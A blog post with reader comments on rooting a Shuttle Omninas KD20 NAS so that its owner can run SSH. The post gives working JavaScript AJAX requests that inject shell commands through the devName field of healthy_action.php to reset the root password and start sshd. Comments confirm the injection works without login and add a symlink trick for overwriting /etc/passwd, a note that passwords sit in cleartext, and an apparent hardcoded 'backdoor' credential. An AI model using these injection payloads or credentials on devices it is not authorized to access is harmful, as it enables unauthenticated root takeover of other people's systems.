msgbartop
msgbarbottom

04 Dec 13 Getting root (and SSHD on boot) with the Shuttle Omninas KD20

I recently picked up a Shuttle Omninas KD20 on sale from NCIX.    It runs Linux, but sshd is disabled by default.  Thankfully it wasn’t too difficult to break in to.

The Storage -> Disk Manager page has an info button that calls smartctl -a.  It doesn’t check parameters passed by the page :)

With the Disk Manager page loaded, open your Web Developer Console and run the following javascript commands:

(pastebin text version; thanks to scotty86 for the paste)

Change the root password:

$.ajax({
type:”POST”,
url: ‘http://192.168.1.93/action/healthy_action.php’,
cache: false,
//data: “devName=sda”+$devName,
data: “devName=/dev/sd; (echo \”foobar\nfoobar\n\” | sudo passwd root) “,
success:function(data){
console.log(data)
}
});

Start sshd:

$.ajax({
type:”POST”,
url: ‘http://192.168.1.93/action/healthy_action.php’,
cache: false,
//data: “devName=sda”+$devName,
data: “devName=/dev/sd; sudo /etc/rc.d/sshd.sh start”,
success:function(data){
console.log(data)
}
});

With that out of the way I was able to login to the NAS, and have sshd start on bootup by editing /etc/rc.

login as: root
[email protected]′s password:
BusyBox v1.10.3 (2013-11-06 11:05:30 CST) built-in shell (ash)
Enter ‘help’ for a list of built-in commands.

OMNINAS-XYZZY> df
Filesystem 1k-blocks Used Available Use% Mounted on
/dev/ram0 15863 2134 13729 13% /initrd
/dev/md0 201556 372 190948 0% /system
/dev/md1 1463634048 27294636 1436339412 2% /share/atonnas
OMNINAS-XYZZY> cd /proc/
OMNINAS-XYZZY> cat cpuinfo
Processor : ARMv6-compatible processor rev 5 (v6l)
processor : 0
BogoMIPS : 299.00

processor : 1
BogoMIPS : 299.82

Features : swp half thumb fastmult edsp java
CPU implementer : 0×41
CPU architecture: 7
CPU variant : 0×0
CPU part : 0xb02
CPU revision : 5

Hardware : Oxsemi NAS
Revision : 0000
Serial : 0000000000000000
OMNINAS-XYZZY>

Yay!

It would be nice if Shuttle just enabled ssh by default though.  Pretty please?

 

Reader's Comments

  1.    

    What version of the firmware was this done to?

    I can not seem to replicate this.

    Reply to this comment
  2.    

    May I inquire as to what version of the firmware you achieved this hack with?

    I’m not having any success attempting this procedure.

    Reply to this comment
  3.    

    Hello,

    thanks for the great tutorial to get sshd to run. I’ve managed to run both javascripts successfully, but when it comes to login via ssh, i get ACCESS DENIED” errors and I don’t know what to do now …

    These are the messages with activated looging:
    Incoming packet #0×7, type 51 / 0×33 (SSH2_MSG_USERAUTH_FAILURE)
    Event Log: Password authentication failed

    Perhaps you can help me once more …? Which password do I need to provide? I’ve tried already with my admin user’s password and user “root”, but I can’t login successfully.

    Please help me once more, to get more out of this NAS.

    Thank you very much!

    Reply to this comment
  4.    

    Hey!

    Thanks a lot, I’ve manged to get into my NAS via SSH!

    Afterwards I tried your advice editing /etc/rc to start SSHd at startup, but I can’t get it work.
    Which file do I have to edit and what are the exact changes to the file?

    Furthermore I’d like to add “strict allocate = yes” to smb.conf in order to get some problems fixed when copying data to the NAS usung robocopy. When I edit this file in /initrd/etc/samba/smb.conf and reboot, the changes are gone.

    Would you please help me once more?

    Thank you and greetings!

    Reply to this comment
  5.    

    Hello,

    another time I have to say: Thank you! I’ve got SSH to work on startup.

    Regarding the parameter in smb.conf I didn’t get any new findings. I can find two smb.conf files, one in initrd/etc/samba and the other one somewhere in the hddapp directory. Every change in each of them is gone after a reboot. If you’re able to find out why that happens and what can be done, I would be very happy.

    Thank you an greetings

    Reply to this comment
  6.    

    I got :

    /*
    Exception: illegal character
    */

    Can you help me ?

    Reply to this comment
  7.    

    Current Firmware Version : 2.34.20131121

    Reply to this comment
  8.    

    Downgrade to 2.33.20130918. Now it says:

    SyntaxError: Unexpected token ILLEGAL

    Reply to this comment
  9.    

    Bello,

    I habe another question. Are there any chances getting Wake on LAN to work somehow?

    This would be another interesting feature.

    Tanks and greetings

    Reply to this comment
  10.    

    Hello,

    I have another question: is there any chance to get wake on lan working on a KD20? This would be another nice feature. I know that the KD21 dows support it, perhaps it’s also possible on a KD20 …

    Thanks and greetings!

    Reply to this comment
  11.    

    Great job, sir!

    Works perfectly on the newest firmware, too. (2.35.20140102)

    If you get a illegal sign- or syntax-error, it’s because of the quotes.. I made a proper pastebin for the first two ajax commands:
    http://pastebin.com/WRdP19PM

    Reply to this comment
  12.    

    Damnit :O
    You don’t even have to be logged in your NAS and you can execute commands as sudoer by the web console or manual post-requests. Therefore it’s a good idea to block any communication from the NAS and the internet.

    Reply to this comment
  13.    

    Hey guys,

    Thanks for this method. I can confirm that the vulnerability still exists in the latest firmware (2.35).

    Just my 2c.

    Cheers and happy hacking :)

    Reply to this comment
    •    

      I want to add that it is indeed a good idea to put a firewall in front of the NAS, so no connections can be made from outside. I also don’t think you should use the AjaXplorer (haven’t researched it yet, will do soon). For prevention, please block ALL connections to your NAS from the internet.

      Reply to this comment
  14.    

    Thanks for this hack.

    How are you editing your rc file?

    There’s no pico, nano or gedit. I found vi, but…I will do more harm than good with that…

    Reply to this comment
  15.    

    I wanted a way to be able to manage the two internal hard drives separately (rather than having them lumped together under JBOD). As I have a 4 GB and a 1 GB, the RAID options weren’t going to work for me either. This is a bit of a kludge, it creates a symbolic link in the folder that is shared by default to the second hard drive.

    1) Enable SSH (See original post)
    2) Change root password (See original post)
    3) Insert first hard drive, configure in single drive mode.
    4) Shutdown the NAS.
    5) Insert second hard drive, power on.
    6) Login using PuTTY
    7) Run: fdisk -l
    8) Find the filesystem name of the second hard drive (typically /dev/sdb1) and make a note of it.
    9) Use fdisk /dev/sdb1 to create the partition if necessary.
    10) Use mkfs.xfs /dev/sdb1 to format the hard drive.
    11) Change directory to /mnt/
    12) mkdir sdb1 (Note: You can change sdb1 to be anything you want, just remember it and be sure to change it whenever /mnt/sdb1 is referenced)
    13) Fix permissions to allow full access to everyone by running the following commands (each line seperately):
    find /mnt/sdb1 -exec chown root.nobody {} \;
    find /mnt/sdb1 -type d -exec chmod 0777 {} \;
    find /mnt/sdb1 -type f -exec chmod 0666 {} \;
    14) Change directory to /etc/
    15) Edit /etc/rc
    16) Add the following lines to the bottom of the configuration right above exit 0. The line running sshd.sh is optional but recommended (it will restart SSH on reboot).
    /etc/rc.d/sshd.sh start
    mount /dev/sdb1 /mnt/sdb1
    ln -s /mnt/sdb1/ /share/atonnas/disk/

    Reply to this comment
    •    

      What would be the function of the last line? You cannot link two file systems to the same filename, can you?

      The first disk will be already linked to /share/atonnas/disk in step 3.

      Reply to this comment
  16.    

    Very funny.
    Passwords are in clear text in this file…
    /system/etc/nas_conf_db.xml

    You can play with the network shares in this files.

    Anybody find a smb.conf somewhere?

    Reply to this comment
  17.    

    FYI on firmware 2.36.20140305 /etc/rc is now /etc/rc.local

    Reply to this comment
    •    

      So you managed to SSH into the NAS with the 2.36.20140305 firmware? Could you help me out?

      The two healthy_action.php calls to change the root password and the starting of sshd seemed to have gone through but when I try to PuTTy to the NAS it always give me a Network Error: Connection refused. Any ideas?

      Reply to this comment
    •    

      I tried to root KD20 with the latest firmware 2.36.20140305 but I have no success so I downgraded to 2.35.20140102.

      Can someone confirm if the vulnerability is no longer available in 2.36.20140305 ?

      Reply to this comment
    •    

      So data: “devName=/dev/sd; sudo /etc/rc.d/sshd.sh start”
      is now: “devName=/dev/sd; sudo /etc/rc.local/sshd.sh start”?

      I just updated my firmware to 2.36.20140305 and am unable to get this to work.

      Reply to this comment
    •    

      Hi,

      I’ve upgraded to firmware 2.36.20140305, but I’m not able to activate SSH again. After the upgrade completed, SSH wasn’t available anymore and trying to reactivate it using the procedure described in the first post, nothing happens and PUTTY says “Network error: Connection refused”. Is there a known problem in getting SSH to work in firmware 2.36?

      Thank you and regards

      Reply to this comment
  18.    

    I had this hack working in 2.35, but when I updated today to firmware 2.36.20140305, it did not work any more :-(

    Anybody still got this working without downgrading to an earlier version?

    One of this days I want to put in a second disk, but without the JBOD hassle, just two separate disks. It seems I need root access and a terminal into the Omninas to do this.

    Paai

    Reply to this comment
  19.    

    BTW: When I paste the ajax commands into the web console, the machine answers ‘[object Object]‘. As I don’t speak javascript, I do not know what it means.

    Paai

    Reply to this comment
  20.    

    As I said, I repeatedly tried to get root to version 2.36.20140305. When I paste the commands to the webconsole in mozilla on an Ubuntu machine, the reaction is as pasted below for both commands

    09:01:34.051 [object XMLHttpRequest]
    09:01:34.085 POST http://192.168.178.17/action/healthy_action.php [HTTP/1.1 200 OK 456ms]
    09:01:34.516 “”
    09:01:38.928 GET http://192.168.178.17/template/disk_manager.php

    yesterday I already posted a report on failure, but it seems the message did not make it to the message board.

    I would very much appreciate any help to get this fixed.

    paai

    Reply to this comment
  21.    

    Did anybody found out how you can enable FTP? Would be awesome for my situation :)

    Thanks!

    Reply to this comment
  22.    

    Hey, I install optware on my kd20, it seems to work ok.
    Here’s what I did.

    (from: http://www.nslu2-linux.org/wiki/Optware/HomePage/)

    # mkdir /share/atonnas/disk/opt
    # ln -s /share/atonnas/disk/opt /opt

    # feed=http://ipkg.nslu2-linux.org/feeds/optware/cs08q1armel/cross/unstable
    # ipk_name=`wget -qO- $feed/Packages | awk ‘/^Filename: ipkg-opt/ {print $2}’`
    # wget $feed/$ipk_name
    # tar -xOvzf $ipk_name ./data.tar.gz | tar -C / -xzvf -
    # mkdir -p /opt/etc/ipkg
    # echo “src cross $feed” > /opt/etc/ipkg/feeds.conf

    # export PATH=/opt/bin:$PATH
    # ipkg update

    but the update doesn’t work, because of the –passive-ftp

    /usr/bin/wget: invalid option — -

    so, I create a new /opt/bin/wget script with these two lines

    ARGS=$(echo $*|sed ‘s/–passive-ftp//’)
    /usr/bin/wget $ARGS

    now ipkg update should work, and then

    # ipkg install nano less

    oups, another problem, “head” not found, “sort” not found… these two are in the coreutils package, so

    # ipkg install coreutils

    but this will generate many “update-alternatives” (symlink) errors, that’s ok for now…

    # cp /opt/bin/coreutils-head /usr/bin/head
    # cp /opt/bin/coreutils-sort /usr/bin/sort

    remove and reinstall coreutils, this time, with the head+sort in /usr/bin, “update-alternatives” should work and the symlinks should be ok.

    # ipkg remove coreutils
    # ipkg install coreutils

    now ipkg install less should work

    # ipkg install less
    # ipkg list | less

    and you can rm /usr/bin/head and /usr/bin/sort if you want.

    Reply to this comment
  23.    

    A completely noob question, but is there any way to install custom firmware on it? Like freenas?

    My main issue, I am missing functionality to run torrent client simultaneously with media server, and FTP server.

    It would be really great to have some modern features.

    Reply to this comment
  24.    

    It’s unfortunate that I have to resort to using SSH to selectively copy files from a hard drive connected to the USB 3 port to the NAS.

    Reply to this comment
  25.    

    anyone try to run sshd on 2.38 firmware?

    Reply to this comment
  26.    

    Hello

    I was trying to login to 2.38 firmware, but with no luck for now. But I was able to extract filesystem from firmware.
    If someone want’s to help, I’ve uploaded original filesystems here:
    http://robi.glut.ga/rootfs2.35.tar.gz
    http://robi.glut.ga/rootfs2.38.tar.gz

    The original hack wont work for sure. File healthy_action.php has been protected:


    $disks = dm_get_disk_properties("high","all");

    foreach ($disks as $disk)
    {
    if ( $disk['blockdev'] == $_POST['devName']) {
    $msg = shell_exec('sudo smartctl -d ata -a '. $disk['blockdev']);
    echo $msg;
    exit();
    }
    }

    Reply to this comment
  27.    

    Just to share with you guys:
    This hack does NOT work on firmware v2.38 !!

    It’s really a shame we have to do these kind of hacks just to get SSH working a NAS… SSH is basic functionality of any NAS if you ask me.

    @ShuttleLabs please enable SSH for the owners of KD20.

    Reply to this comment
  28.    

    Actually this procedure to activate sshd has been obsoleted, the latest firmware has been fixed to close the “security hole” which was used by this page.
    If you can get the older firmware, it could be available. However, upgrading firmware means overwriting the sshd configuration, it would not be available after upgrading the firmware.

    Reply to this comment
  29.    

    For Root on the latest FW (OMNINAS-7821_2.38.20140728.TAR.GZ) …

    1) Install Vulnerable FW eg. OMNINAS-7821_2.35.20140102.TAR.GZ

    2) Execute rooting procedure from above.
    The important piece is the creation of a user account with known password and shell (root user in this case).

    3) Start and verify SSHD http:///admin/ssh.php
    The above requires a session cookie for ‘aton_nas_ssh’

    4) If OK, reflash latest FW and execute step 3 to re-enable SSH.

    Hope this helps some one.
    - Semmy

    Reply to this comment
  30.    

    or =)

    1) Create user account
    2) Create user share
    3) Create a symlink pointing to the root. Eg. “ln -s / ./my_root”
    4) Connect to the share and upload the root symlink created above
    5) point your brwoser to “http://your_omninas/admin/ssh.php”, select the SSH check box and click Save to launch the SSHD. (requires a session cookie for ‘aton_nas_ssh’)
    6) point your browser to “http://your_omninas/filesystem/index.php
    7) login, browse to the share created in step 2, click on the symlink uploaded in step 4.

    You should now be on the ‘/’ of the NAS FS. From here you could replace the /etc/passwd file with one where you know the root password from or upload your own scripts to ‘/usr/htdocs/’ to reset the root password.

    Reply to this comment
  31.    

    Instead of creating a cookie to access /admin, You can use user “atonnas” password “backdoor”.

    Reply to this comment

Leave a Comment